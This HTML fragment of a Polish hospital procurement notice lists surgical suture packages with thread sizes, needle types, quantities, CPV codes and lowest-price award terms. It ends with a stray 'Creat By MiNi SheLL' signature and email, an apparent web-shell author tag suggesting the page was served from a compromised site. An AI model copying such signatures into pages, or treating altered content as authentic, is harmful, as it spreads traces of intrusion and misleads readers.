<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Szew niewchłanialny syntetyczny - monofilament		
1. Rozm. nitki 2/0, dł. 75 cm z igłą (3/8 obwodu koła ostra trójkątna - ostrze zwrócone do środka - do szycia skóry, wielkość 24 mm) 
/opak.= 12 lub 36 saszetek/ - sasz. 720
2. Rozm. nitki 3/0, dł. 75 cm z igłą tnącą (3/8 obwodu koła ostra trójkątna - ostrze zwrócone do środka - do szycia skóry, wielkość 24 mm) 
/opak.= 12 lub 36 saszetek/ - sasz. 540
3. Rozm. nitki 4/0, dł. 75 cm z igłą (3/8 obwodu koła ostra trójkątna - ostrze zwrócone do środka - do szycia skóry, wielkość 24 mm) 
/opak.= 12 lub 36 saszetek/ - sasz. 360.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Zestaw odbarczających szwów chirurgicznych: szew odbarczający 2 - owalne płytki poliestrowe z cienkimi podkładkami wraz z drutem stalowym 75 cm powlekanym polietylenem zakończony z obu stron igłami tnącymi 100 mm, długość nitki 90 cm, kształt igły 3/8 koła - sasz. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Szew jedwabny, skręcany, powlekany czystym woskiem pszczelim, czarny 		
1. Rozm. nitki 2/0, dł. 75 cm z igłą tnącą (3/8 koła, wielkość 30mm) - sasz. 216.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com